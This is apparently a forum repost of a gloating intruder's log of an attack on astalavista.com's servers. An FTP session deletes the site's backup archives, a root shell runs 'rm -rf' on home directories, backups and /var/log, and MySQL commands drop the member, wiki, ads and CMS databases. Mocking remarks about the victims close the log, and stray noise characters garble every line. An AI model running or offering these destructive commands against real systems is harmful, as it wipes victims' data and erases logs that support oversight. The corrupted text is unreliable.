0 {5 ~- F& V$ a9 ^' m- o/ H3 _227 Entering Passive Mode (212,254,194,163,2,189)
' v! b9 |2 ~$ T {! ~- m: ?8 K150 Opening BINARY mode data connection for ‘file list’.# m1 K. u9 E1 h q
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar9 U o3 g" F* p8 @
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
8 U9 [" _3 f* T+ ]/ O( H/ j# ^-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2( T; ?/ z! Z) ^" l
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
6 W' n! m$ H. J1 _-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar. _2 O3 }3 K- M/ M
[snip]2 N! g5 x D! X& a# d
226 Transfer complete.; `# R3 Y& ?; Q6 o# B
ftp> mdelete *4 {' @. R; { K& i. @
ftp> ls -la$ l+ X6 G h# n& U
227 Entering Passive Mode (212,254,194,163,2,193)5 ?- n7 V% S0 e. r& b
150 Opening BINARY mode data connection for ‘file list’.$ D# j1 P7 Y$ z; [
226 Transfer complete.) p/ H* z% X( M$ K
ftp>
" z: c3 c, D0 q& ^% ^8 \8 h" |9 B+ h7 G9 b
sh-3.2# cd /home/ G8 x/ J) f! X6 y# @/ `
sh-3.2# ls -la
# O2 `% x8 _! d3 |total 120
6 Z n9 C8 v% K. A% i0 b6 w% K4 U! Adrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
/ R1 k& w! b) A D! s& Zdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
. w* [% \2 h5 c! g' I7 j/ Hdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
/ m+ C# W+ h( ^-rw——- 1 root root 8192 Jun 4 03:03 aquota.group1 p: m; y# ]8 Y
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user8 V( W5 U6 M6 g3 h
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet E/ C, ?; ?/ F5 x3 T
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
# A3 q; {9 f: G+ R. e8 Tdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161. l {$ I2 h6 C5 C* s
drwx–x–x 10 com com 4096 Apr 28 12:40 com+ p( V% W2 O8 T. Q$ h
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
( d1 g( z- `# M0 _/ \. s. E @drwx—— 3 jon jon 4096 Sep 21 2007 jon9 |! y2 q7 G' W% u6 G5 ~
drwx—— 2 root root 16384 Sep 11 2007 lost+found( O- V: d% Y Q* L# z: L: y: I
drwxr-xr-x 2 root root 4096 Sep 14 2007 my. D" u1 K6 ^, c
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
: K; n: _1 N( [+ g) A4 b; U6 K2 ^drwx—— 2 jon jon 4096 Sep 15 2007 test
. o8 q0 e; @* F, Q' \# Ddrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
# G. q$ g: D3 i+ `# u/ \; _2 {" k. v) X4 ?! g8 }1 X
sh-3.2# rm -rf backup/4 M8 g/ i' c. d7 U) F7 P
sh-3.2# rm -rf backup.14161/
, E6 z B1 x! Ssh-3.2# rm -rf ftp/
# G6 b( I; ~: _# W3 {# a9 y6 ~sh-3.2# rm -rf jon/
/ g" K1 E" R: i* {3 ^& xsh-3.2# rm -rf my/
+ J7 b0 I7 c- t- O& xsh-3.2# rm -rf mysqldata/5 P+ g1 \2 t' w6 @8 W+ x( n1 k
sh-3.2# rm -rf test/6 A3 V6 j7 p0 E8 t
sh-3.2# rm -rf tmp/
& L* c ~! z7 p( o; t, c. P+ Bsh-3.2# cd ~% N7 L( v+ V& _" s6 W
sh-3.2# rm -rf *7 _ E6 A9 y" l% @- Q# K
sh-3.2# rm -rf /var/log/
& l" i" b- B2 N4 P6 e$ |' Vrm: cannot remove directory `/var/log//proftpd’: Directory not empty6 R( L. M: A9 V% o* q
sh-3.2# rm -rf /home/*
4 _+ i7 {3 Q- V1 B2 h5 {sh-3.2# mysql
4 y" }' R) }/ X* I E) ` k7 A$ d9 eWelcome to the MySQL monitor. Commands end with ; or \g.
; S- _4 r- ?0 B8 w: Z4 \/ jYour MySQL connection id is 407156% u5 Y* N: q& n
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
9 t8 U, K# F/ }% \) Q/ ~, P# w( I% a! c. Y+ r+ N# p
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.6 J' P2 X4 p# M, q$ g! y& ]9 U. s F
. A7 x3 Y& W% w& [8 V
mysql> show databases;( b: K: U. z0 s C. C: q+ s! \
+———————–+
+ `5 b/ k: P7 Y6 x. M2 [: Y2 J| Database |$ i# O* }8 G' L$ `, ^% [
+———————–+% s0 j k; K( H; g6 e, w3 x
| information_schema |8 p0 o# x) v: v3 ^, W
| astanet_ads |( I" Q% I1 D7 q, O& e" I# M
| astanet_mailing_lists |
# d* O/ g( x7 B. k1 z F, l6 b| astanet_mediawiki |
# |. g4 Y9 U- b8 W K( s| astanet_membersystem |! c" m" S h6 l M9 M
| com_contrexx |
' Q/ t" E1 [3 [4 N$ r8 f| com_contrexx2 |' l/ y2 j# f+ q) e5 f; t: \6 H
| com_contrexx2_live |
1 D) T7 q$ @; O) H| da_roundcube |* j6 k4 S0 a* y! o, e
| dolphin |1 X P" h+ R2 H; @+ y
| ideapool |
: b: W* w1 c, s) B: G! ^* o6 |1 [ T| mysql |. O; H" @8 a( J5 g9 N
| test |7 j4 L' c* |# }5 ^2 j
| yourmaster |1 d4 b+ I$ ^: x2 p3 R% @% X
+———————–+
9 z8 o- I; C+ Y8 I* c) V14 rows in set (0.03 sec)
0 R5 ^/ K$ i: |! x
5 |+ ?2 ^1 R2 W6 Zmysql> drop database astanet_membersystem;) O$ t. u' o3 G! \
droQuery OK, 46 rows affected (0.81 sec)
5 V1 J6 J: d$ `* f/ p, B- z E. G- S: l
mysql> drop database com_contrexx;
$ B5 X) C! N& {8 I' F) S/ G8 sQuery OK, 211 rows affected (2.72 sec)
3 x. P& T {% R# }# _0 N4 N# \; l# G
mysql> drop database com_contrexx2;0 G- |6 B6 _+ X+ K6 C: P$ |# }' X& V$ y
Query OK, 237 rows affected (2.23 sec)" p/ s- O; ~) U9 [! ^) \" w
/ z! |7 @$ E8 r' [$ wmysql> drop database com_contrexx2_live;5 Q; D8 Y" Q; Q0 s
Query OK, 227 rows affected (7.63 sec)& b; D8 k7 f5 I8 Z
5 E" Y1 e! F4 ^2 y6 O
mysql> drop database ideapool;0 l. u, y% B5 w- i0 ]) d
Query OK, 69 rows affected (0.19 sec), b5 a$ E+ W9 n- x5 t& c
. S& m+ R: Q8 i7 s! u4 c2 L9 {" _6 h( Vmysql> drop database yourmaster;* ^: A' D9 C0 v6 r4 \8 ?
Query OK, 158 rows affected (0.55 sec)
% {$ T2 C- S g6 G9 b# o1 }
. F# S. C3 B$ Lmysql> drop database astanet_ads;( h, h4 @1 B4 \/ t0 z: C' w9 @
Query OK, 9 rows affected (0.11 sec)- d$ k$ `3 D& o* e+ ~# N/ r
9 j/ m& ^: c) U1 F* ]mysql> drop database astanet_mailing_lists;$ n1 f- ~/ H$ v" q0 ]! V
Query OK, 24 rows affected (1.47 sec)
9 n% f0 A. W) P) M8 X4 W3 }; V$ Z |2 d8 u
mysql> drop database astanet_mediawiki;% H6 q5 L }9 H7 i1 \* `4 _
Query OK, 31 rows affected (0.51 sec)' a' C( E( n E
9 y8 K# p. `: A% R! f3 D! r
mysql> show databases;
( {1 ]! h: X' Q& W$ }6 `+——————–+
: p( A" t+ Q# g* Q4 ~. p: K| Database |
2 K8 O+ J' N s+——————–+2 A. W3 s) f2 ~/ `9 ?6 _; _
| information_schema |4 w9 F- A f0 E4 p1 t k# N* U9 L
| da_roundcube |
5 j2 j. q0 _% e; F& ?4 O| dolphin |
; d% `2 E- x( e9 O; b" c| mysql |
1 Y" W) }4 r: b; v5 Y0 U9 K| test |
8 }" p$ m! l" ]* u+——————–+! g7 u" ?! f8 ]0 H( ?. C% H5 J. h- [
5 rows in set (0.00 sec)1 j! ]$ F1 U9 p" z0 d
+ f0 ^' U) U O/ i
What a journey! We’re not sure exactly why the “Terminator” had any influence on% l, s& S$ J/ {4 ` m$ R
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
0 M) \0 Y4 P0 n2 h7 \1 Xwrong to say this pack of morons *wont be back*." @# }% h: s3 s$ _
|
发表于 2012-11-6 21:07:34
收藏
支持
反对